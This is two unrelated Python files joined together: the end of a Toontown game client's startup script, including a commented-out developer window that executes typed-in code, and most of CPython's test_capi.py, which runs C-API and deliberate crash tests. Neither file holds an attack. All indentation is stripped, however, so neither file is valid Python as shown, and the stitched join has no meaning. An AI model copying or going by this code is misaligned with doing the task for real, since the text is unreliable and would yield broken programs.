from toontown.pgui import DirectGuiGlobals as PGUIGlobals
notify.info('Setting the default font...')
DirectGuiGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
PGUIGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
launcher.setPandaErrorCode(7)
from toontown.toonbase import ToonBase
ToonBase.ToonBase()
from pandac.PandaModules import *
if base.win is None:
notify.error('Unable to open window; aborting.')
launcher.setPandaErrorCode(0)
launcher.setPandaWindowOpen()
ConfigVariableDouble('decompressor-step-time').setValue(0.01)
ConfigVariableDouble('extractor-step-time').setValue(0.01)
backgroundNodePath = aspect2d.attachNewNode(backgroundNode, 0)
backgroundNodePath.setPos(0.0, 0.0, 0.0)
backgroundNodePath.setScale(render2d, VBase3(1))
backgroundNodePath.find('**/fg').hide()
logo = OnscreenImage(
image='phase_3/maps/toontown-logo.png',
scale=(1 / (4.0/3.0), 1, 1 / (4.0/3.0)),
pos=backgroundNodePath.find('**/fg').getPos())
logo.setTransparency(TransparencyAttrib.MAlpha)
logo.setBin('fixed', 20)
logo.reparentTo(backgroundNodePath)
backgroundNodePath.find('**/bg').setBin('fixed', 10)
base.graphicsEngine.renderFrame()
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
DirectGuiGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
PGUIGlobals.setDefaultRolloverSound(base.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
PGUIGlobals.setDefaultClickSound(base.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
PGUIGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
from toontown.toonbase import TTLocalizer
from otp.otpbase import OTPGlobals
OTPGlobals.setDefaultProductPrefix(TTLocalizer.ProductPrefix)
#For Devs only. (The below)
'''from direct.stdpy import threading, thread
def __inject_wx(_):
code = textbox.GetValue()
exec (code, globals())
def openInjector_wx():
import wx
app = wx.App(redirect = False)
frame = wx.Frame(None, title = "TTPA Dev Injector", size=(640, 400), style=wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.MINIMIZE_BOX)
panel = wx.Panel(frame)
button = wx.Button(parent = panel, id = -1, label = "Inject", size = (50, 20), pos = (295, 0))
global textbox
textbox = wx.TextCtrl(parent = panel, id = -1, pos = (20, 22), size = (600, 340), style = wx.TE_MULTILINE)
frame.Bind(wx.EVT_BUTTON, __inject_wx, button)
frame.Show()
app.SetTopWindow(frame)
textbox.AppendText(" ")
threading.Thread(target = app.MainLoop).start()
openInjector_wx()'''
if base.musicManagerIsValid:
music = base.loader.loadMusic('phase_3/audio/bgm/tt_theme.ogg')
if music:
music.setLoop(1)
music.setVolume(0.9)
music.play()
notify.info('Loading the default GUI sounds...')
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
else:
music = None
from toontown.toonbase import ToontownLoader
from direct.gui.DirectGui import *
serverVersion = base.config.GetString('server-version', 'no_version_set')
'''
Let's have these here so you can tell if dev or debug mode is enabled or not
easily.
'''
if __dev__:
serverVersionText = serverVersion + "-dev"
elif __debug__:
serverVersionText = serverVersion + "-debug"
else:
serverVersionText = serverVersion
version = OnscreenText(serverVersionText, pos=(-1.3, -0.975), scale=0.06, fg=Vec4(0, 0, 0, 1), align=TextNode.ALeft)
version.setPos(0.03,0.03)
version.reparentTo(base.a2dBottomLeft)
from toontown.suit import Suit
Suit.loadModels()
loader.beginBulkLoad('init', TTLocalizer.LoaderLabel, 138, 0, TTLocalizer.TIP_NONE, 0)
from toontown.toonbase.ToonBaseGlobal import *
from direct.showbase.MessengerGlobal import *
from toontown.distributed import ToontownClientRepository
cr = ToontownClientRepository.ToontownClientRepository(serverVersion, launcher)
cr.music = music
del music
base.initNametagGlobals()
base.cr = cr
loader.endBulkLoad('init')
from otp.friends import FriendManager
from otp.distributed.OtpDoGlobals import *
cr.generateGlobalObject(OTP_DO_ID_FRIEND_MANAGER, 'FriendManager')
if not launcher.isDummy():
base.startShow(cr, launcher.getGameServer())
else:
base.startShow(cr)
backgroundNodePath.reparentTo(hidden)
backgroundNodePath.removeNode()
del backgroundNodePath
del backgroundNode
del tempLoader
version.cleanup()
del version
base.loader = base.loader
__builtin__.loader = base.loader
autoRun = ConfigVariableBool('toontown-auto-run', 1)
if autoRun:
try:
run()
except SystemExit:
raise
except:
from toontown.toonbase import ToonPythonUtil as PythonUtil
print PythonUtil.describeException()
raise
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by definition,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
return err.decode('utf-8', 'replace').replace('\r', '')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@support.requires_subprocess()
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned NULL without setting an exception\n'
r'Python runtime state: initialized\n'
r'SystemError: <built-in function return_null_without_error> '
r'returned NULL without setting an exception\n'
r'\n'
r'Current thread.*:\n'
r' File .*", line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an exception')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned a result with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError\n'
r'\n'
r'The above exception was the direct cause '
r'of the following exception:\n'
r'\n'
r'SystemError: <built-in '
r'function return_result_with_error> '
r'returned a result with an exception set\n'
r'\n'
r'Current thread.*:\n'
r' File .*, line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an exception set')
def test_getitem_with_error(self):
# Test _Py_CheckSlotResult(). Raise an exception and then calls
# PyObject_GetItem(): check that the assertion catches the bug.
# PyObject_GetItem() must not be called with an exception set.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.getitem_with_error({1: 2}, 1)
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
if 'SystemError: ' not in err:
self.assertRegex(err,
r'Fatal Python error: _Py_CheckSlotResult: '
r'Slot __getitem__ of type dict succeeded '
r'with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError: bug\n'
r'\n'
r'Current thread .* \(most recent call first\):\n'
r' File .*, line 6 in <module>\n'
r'\n'
r'Extension modules: _testcapi \(total: 1\)\n')
else:
# Python built with NDEBUG macro defined:
# test _Py_CheckFunctionResult() instead.
self.assertIn('returned a result with an exception set', err)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
lines = out.splitlines()
for i, line in enumerate(lines, 1):
self.assertIn(b'MemoryError', out)
*_, count = line.split(b' ')
count = int(count)
self.assertLessEqual(count, i*5)
self.assertGreaterEqual(count, i*5-1)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = decode_stderr(err)
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
@support.requires_subprocess()
def test_fatal_error(self):
# By default, stdlib extension modules are ignored,
# but not test modules.
expected = ('_testcapi',)
not_expected = ('sys',)
code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
# Mark _testcapi as stdlib module, but not sys
expected = ('sys',)
not_expected = ('_testcapi',)
code = textwrap.dedent('''
import _testcapi, sys
sys.stdlib_module_names = frozenset({"_testcapi"})
_testcapi.fatal_error(b"MESSAGE")
''')
self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
s = _testcapi.pyobject_repr_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_str_from_null(self):
s = _testcapi.pyobject_str_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_bytes_from_null(self):
s = _testcapi.pyobject_bytes_from_null()
self.assertEqual(s, b'<NULL>')
def test_Py_CompileString(self):
# Check that Py_CompileString respects the coding cookie
_compile = _testcapi.Py_CompileString
code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
result = _compile(code)
expected = compile(code, "<string>", "exec")
self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
# bpo-44133: Ensure that the "Py_FrozenMain" and
# "PyThread_get_thread_native_id" symbols are exported by the Python
# (directly by the binary, or via by the Python dynamic library).
ctypes = import_helper.import_module('ctypes')
names = []
# Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
if hasattr(_thread, 'get_native_id'):
names.append('PyThread_get_thread_native_id')
# Python/frozenmain.c fails to build on Windows when the symbols are
# missing:
# - PyWinFreeze_ExeInit
# - PyWinFreeze_ExeTerm
# - PyInitFrozenExtensions
if os.name != 'nt':
names.append('Py_FrozenMain')
for name in names:
with self.subTest(name=name):
self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
        #now, stick around until l has grown to n entries
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
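        # Run code in a fresh subinterpreter and verify that its sys.modules
        # and builtins are distinct objects from this interpreter's.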
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
def test_module_state_shared_in_global(self):
"""
bpo-44050: Extension module state should be shared between interpreters
when it doesn't support sub-interpreters.
"""
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
script = textwrap.dedent(f"""
import importlib.machinery
import importlib.util
import os
fullname = '_test_module_state_shared'
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
attr_id = str(id(module.Error)).encode()
os.write({w}, attr_id)
""")
exec(script)
main_attr_id = os.read(r, 100)
ret = support.run_in_subinterp(script)
self.assertEqual(ret, 0)
subinterp_attr_id = os.read(r, 100)
self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
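    # Pull every test_* callable exported by _testcapi into this class as
    # attributes, so the C-level tests run as ordinary unittest methods
    # (names ending in '_code' are excluded here).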
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
def test_version_api_data(self):
self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
@support.requires_subprocess()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
